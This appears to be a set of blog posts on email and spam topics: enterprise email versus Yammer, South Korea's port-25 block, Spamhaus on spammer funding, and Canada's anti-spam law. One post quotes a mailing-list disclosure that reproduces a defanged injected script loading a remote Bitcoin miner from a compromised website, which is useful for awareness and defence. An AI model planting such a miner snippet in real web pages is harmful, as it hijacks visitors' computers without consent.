Is Email Really Dying in the Enterprise?

The Financial Times recently wrote an article titled, “End email: Firms find a cure for inbox hell“, in which they declared — for the thousandth time in mainstream media since 1996 — that email is dying in the enterprise. The reasons sited for the death of email include privacy and productivity. Apparently, social networking technologies such as Yammer are going to replace email with something more productive; and paper notes will serve to make communications private once again.

Here’s the problem with this reasoning. “Email” in the context of Internet electronic mail is simply a collection of protocols for exchanging messages between parties over the Internet. Yammer and other systems serve the same function, except using different, less open (and often completely closed) protocols. Yammer is essentially the same as email, but implemented within a closed network, where greater control can be effected on the participants. But if you need to get a message to someone who isn’t participating in your private network – be it Facebook, Yammer, Twitter, or some other new system – email will always be the fallback.

My position is that email is a great platform on top of which rich collaboration tools can be built. For instance, Xobni implements an enterprise layer on top of email that pulls together all the information that might be relevant to whatever conversation you’re viewing in your mail client (Outlook, Gmail, etc.). With Xobni, you get to keep the universal acceptability and interoperability of email, while benefiting from integration with other data sources.

Systems like Yammer will have their place, but email is not going away any time soon. It will just get better.

Bitcoin Mining Coming to a Compromised Web Site Near You

A poster to the Full Disclosure mailing list announced today that he had discovered JavaScript-based Bitcoin mining software on a compromised web site. Here’s the original post for reference:

Group,
Recently I ran across the below on a site:

<script type="text/javascript" src="hxxp://www.bitcoinplus.com/js/miner.js">
</script>
<script type="text/javascript">// <![CDATA[
  BitcoinPlusMiner(10215318);
// ]]></script>

I know the 10215318 represents the bitcoin email, but I was curious if
there was a way to figure out what the email actually was instead of the
number above.  Would be nice to find out what email address may have been
involved in  compromising the site.  Thanks for any help you may be able
to provide.

James

For those who are not in the know about Bitcoin, it suffices to say that Bitcoin provides a way of turning CPU cycles into cash. We’ve known for a while that botnet operators have been deploying Bitcoin mining programs onto compromised PCs. The difference with what’s been discussed today is that the mining happens not through a botnet installation, but rather simply by visiting the web site and running its JavaScript code in your browser (something that is automatic).

For a cybercriminal, the idea of deploying a bit of JavaScript onto a compromised web site and then monetizing millions of spare cycles of CPU time from web site visitors must evoke something close to a religious experience. Is it time for our web browsers to police JavaScript CPU consumption more aggressively?

South Korea to Block Port 25

Last week, according to the BBC, South Korea’s Internet and Security Agency began encouraging ISPs to block port 25 to limit the quantity of botnet spam emanating from the country. South Korea has long had a reputation as a haven for botnet spam, most likely because of the large number of Internet users in the country, and the extremely high quality and low cost of their broadband access. The recommendation to block port 25 will probably improve things in South Korea, if the ISPs get around to implementing this change. I’m not sure how influential the regulator is in that country, but if it’s like other developed countries, the ISPs are likely to drag their feet to avoid affecting users negatively.

Tags: block, korea, outbound spam

Spamhaus thinks governments should cut off funds to spammers

In a November 1st post entitled, “Who’s Really Paying Cybercrimals?” influential blocklist provider Spamhaus suggests that it’s perhaps time that governments started using their financial leverage to choke off funding to spammers, in the same way that they have choked off funding to groups like Wikileaks. This is an interesting idea, because recent research has suggested that the vast majority of spam revenue flows through a relatively small set of payment processors (see Show Me the Money: Characterizing Spam-advertised Revenue [PDF]). If governments were to shut down just a small number of payment processors, spammers would find their business suddenly a great deal less profitable.

What happens after these sources of funds are cut off is anyone’s guess; however, I wouldn’t rule out a move toward pseudonymous payment systems like Bitcoin, or the use of other creative techniques to get around the issue of government control. Wikileaks was particular vulnerable to having its funds choked off because it was easy for Visa and Mastercard to identify transactions headed their way. It’s perhaps a little more difficult to recognize spam-related transactions, because the recipient’s merchant account can switch frequently from one entity to another, and because the patterns of transactions look a great deal like legitimate e-commerce.

Lobbyists put Canada’s new anti-spam law at risk

Earlier this year, the anti-spam community thought it had scored a major win by enacting the toughest anti-spam laws in the world, right here in Canada. Then today, Michael Geist, a law professor and copyright expert at the University of Ottawa, writes that, “it is déjà vu all over again as the government works to finalize the regulations for the anti-spam legislation and the same groups make many of the same arguments.” Apparently, the Canadian anti-spam law is too tough on marketers, or so they would like us to believe. Fortunately, the law has been passed – it attained “royal assent” in December 2010. What’s being held up are the regulations – the finer points that set out the precise meanings of things in the Act itself.

Canada’s new anti-spam law, titled the Fighting Internet and Wireless Spam Act, sets out some tough requirements on marketers, which are designed to prevent them from sending us email we don’t really want. Unlike the American CAN-SPAM act passed several years ago, the Canadian law requires marketers to obtain your consent before sending you email. But it’s the penalties that really differentiate the Canadian act from its American cousin. Marketers can be sued for violations of the Act even if the email they are sending is originating from another country. This empowers Canadians to sue firms in the US and elsewhere, even though the anti-spam laws in those countries may not be as strict.

Here’s the section that makes me the most excited:

48. (1) A person who alleges that they are affected by an act or omission that constitutes a contravention of any of sections 7 to 10 of this Act or of section 5 of the Personal Information Protection and Electronic Documents Act that relates to a collection or use described in subsection 7.1(2) or (3) of that Act — or that constitutes conduct that is reviewable under section 74.011 of the Competition Act — may apply to a court of competent jurisdiction for an order under section 52 against one or more persons who they allege have committed the act or omission or who they allege are liable for the contravention or reviewable conduct by reason of section 53 or 54.

I know of at least one email technology expert in Canada who is looking forward to setting up a partnership with a litigation practice, specifically to go after American marketers who fall afoul of the new Canadian anti-spam law. I suppose he’ll have to wait a little longer now.